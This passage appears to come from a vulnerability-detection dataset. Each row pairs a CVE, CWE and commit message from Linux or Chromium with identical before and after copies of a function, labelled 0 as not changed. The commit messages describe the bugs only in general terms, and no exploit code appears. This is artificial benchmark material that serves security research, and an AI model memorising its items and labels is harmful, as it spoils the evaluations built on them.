not eligible during next spinloop */ kvm_vcpu_set_dy_eligible(me, false); }
C
linux
0
CVE-2014-3191
https://www.cvedetails.com/cve/CVE-2014-3191/
CWE-416
https://github.com/chromium/chromium/commit/11a4cc4a6d6e665d9a118fada4b7c658d6f70d95
11a4cc4a6d6e665d9a118fada4b7c658d6f70d95
Defer call to updateWidgetPositions() outside of RenderLayerScrollableArea. updateWidgetPositions() can destroy the render tree, so it should never be called from inside RenderLayerScrollableArea. Leaving it there allows for the potential of use-after-free bugs. BUG=402407 [email protected] Review URL: https://codereview.chromium.org/490473003 git-svn-id: svn://svn.chromium.org/blink/trunk@180681 bbb929c8-8fbe-4397-9dbb-9b2b20218538
void FrameView::scrollTo(const IntSize& newOffset) { LayoutSize offset = scrollOffset(); ScrollView::scrollTo(newOffset); if (offset != scrollOffset()) { updateLayersAndCompositingAfterScrollIfNeeded(); scrollPositionChanged(); } frame().loader().client()->didChangeScrollOffset(); }
void FrameView::scrollTo(const IntSize& newOffset) { LayoutSize offset = scrollOffset(); ScrollView::scrollTo(newOffset); if (offset != scrollOffset()) { updateLayersAndCompositingAfterScrollIfNeeded(); scrollPositionChanged(); } frame().loader().client()->didChangeScrollOffset(); }
C
Chrome
0
CVE-2016-5696
https://www.cvedetails.com/cve/CVE-2016-5696/
CWE-200
https://github.com/torvalds/linux/commit/75ff39ccc1bd5d3c455b6822ab09e533c551f758
75ff39ccc1bd5d3c455b6822ab09e533c551f758
tcp: make challenge acks less predictable Yue Cao claims that current host rate limiting of challenge ACKS (RFC 5961) could leak enough information to allow a patient attacker to hijack TCP sessions. He will soon provide details in an academic paper. This patch increases the default limit from 100 to 1000, and adds some randomization so that the attacker can no longer hijack sessions without spending a considerable amount of probes. Based on initial analysis and patch from Linus. Note that we also have per socket rate limiting, so it is tempting to remove the host limit in the future. v2: randomize the count of challenge acks per second, not the period. Fixes: 282f23c6ee34 ("tcp: implement RFC 5961 3.2") Reported-by: Yue Cao <[email protected]> Signed-off-by: Eric Dumazet <[email protected]> Suggested-by: Linus Torvalds <[email protected]> Cc: Yuchung Cheng <[email protected]> Cc: Neal Cardwell <[email protected]> Acked-by: Neal Cardwell <[email protected]> Acked-by: Yuchung Cheng <[email protected]> Signed-off-by: David S. Miller <[email protected]>
static inline void tcp_in_ack_event(struct sock *sk, u32 flags) { const struct inet_connection_sock *icsk = inet_csk(sk); if (icsk->icsk_ca_ops->in_ack_event) icsk->icsk_ca_ops->in_ack_event(sk, flags); }
static inline void tcp_in_ack_event(struct sock *sk, u32 flags) { const struct inet_connection_sock *icsk = inet_csk(sk); if (icsk->icsk_ca_ops->in_ack_event) icsk->icsk_ca_ops->in_ack_event(sk, flags); }
C
linux
0
CVE-2019-11487
https://www.cvedetails.com/cve/CVE-2019-11487/
CWE-416
https://github.com/torvalds/linux/commit/6b3a707736301c2128ca85ce85fb13f60b5e350a
6b3a707736301c2128ca85ce85fb13f60b5e350a
Merge branch 'page-refs' (page ref overflow) Merge page ref overflow branch. Jann Horn reported that he can overflow the page ref count with sufficient memory (and a filesystem that is intentionally extremely slow). Admittedly it's not exactly easy. To have more than four billion references to a page requires a minimum of 32GB of kernel memory just for the pointers to the pages, much less any metadata to keep track of those pointers. Jann needed a total of 140GB of memory and a specially crafted filesystem that leaves all reads pending (in order to not ever free the page references and just keep adding more). Still, we have a fairly straightforward way to limit the two obvious user-controllable sources of page references: direct-IO like page references gotten through get_user_pages(), and the splice pipe page duplication. So let's just do that. * branch page-refs: fs: prevent page refcount overflow in pipe_buf_get mm: prevent get_user_pages() from overflowing page refcount mm: add 'try_get_page()' helper function mm: make page ref count overflow check tighter and more explicit
pipe_release(struct inode *inode, struct file *file) { struct pipe_inode_info *pipe = file->private_data; __pipe_lock(pipe); if (file->f_mode & FMODE_READ) pipe->readers--; if (file->f_mode & FMODE_WRITE) pipe->writers--; if (pipe->readers || pipe->writers) { wake_up_interruptible_sync_poll(&pipe->wait, EPOLLIN | EPOLLOUT | EPOLLRDNORM | EPOLLWRNORM | EPOLLERR | EPOLLHUP); kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN); kill_fasync(&pipe->fasync_writers, SIGIO, POLL_OUT); } __pipe_unlock(pipe); put_pipe_info(inode, pipe); return 0; }
pipe_release(struct inode *inode, struct file *file) { struct pipe_inode_info *pipe = file->private_data; __pipe_lock(pipe); if (file->f_mode & FMODE_READ) pipe->readers--; if (file->f_mode & FMODE_WRITE) pipe->writers--; if (pipe->readers || pipe->writers) { wake_up_interruptible_sync_poll(&pipe->wait, EPOLLIN | EPOLLOUT | EPOLLRDNORM | EPOLLWRNORM | EPOLLERR | EPOLLHUP); kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN); kill_fasync(&pipe->fasync_writers, SIGIO, POLL_OUT); } __pipe_unlock(pipe); put_pipe_info(inode, pipe); return 0; }
C
linux
0
CVE-2014-1713
https://www.cvedetails.com/cve/CVE-2014-1713/
CWE-399
https://github.com/chromium/chromium/commit/f85a87ec670ad0fce9d98d90c9a705b72a288154
f85a87ec670ad0fce9d98d90c9a705b72a288154
document.location bindings fix BUG=352374 [email protected] Review URL: https://codereview.chromium.org/196343011 git-svn-id: svn://svn.chromium.org/blink/trunk@169176 bbb929c8-8fbe-4397-9dbb-9b2b20218538
static void voidMethodOptionalStringArgMethod(const v8::FunctionCallbackInfo<v8::Value>& info) { TestObjectPython* imp = V8TestObjectPython::toNative(info.Holder()); if (UNLIKELY(info.Length() <= 0)) { imp->voidMethodOptionalStringArg(); return; } V8TRYCATCH_FOR_V8STRINGRESOURCE_VOID(V8StringResource<>, optionalStringArg, info[0]); imp->voidMethodOptionalStringArg(optionalStringArg); }
static void voidMethodOptionalStringArgMethod(const v8::FunctionCallbackInfo<v8::Value>& info) { TestObjectPython* imp = V8TestObjectPython::toNative(info.Holder()); if (UNLIKELY(info.Length() <= 0)) { imp->voidMethodOptionalStringArg(); return; } V8TRYCATCH_FOR_V8STRINGRESOURCE_VOID(V8StringResource<>, optionalStringArg, info[0]); imp->voidMethodOptionalStringArg(optionalStringArg); }
C
Chrome
0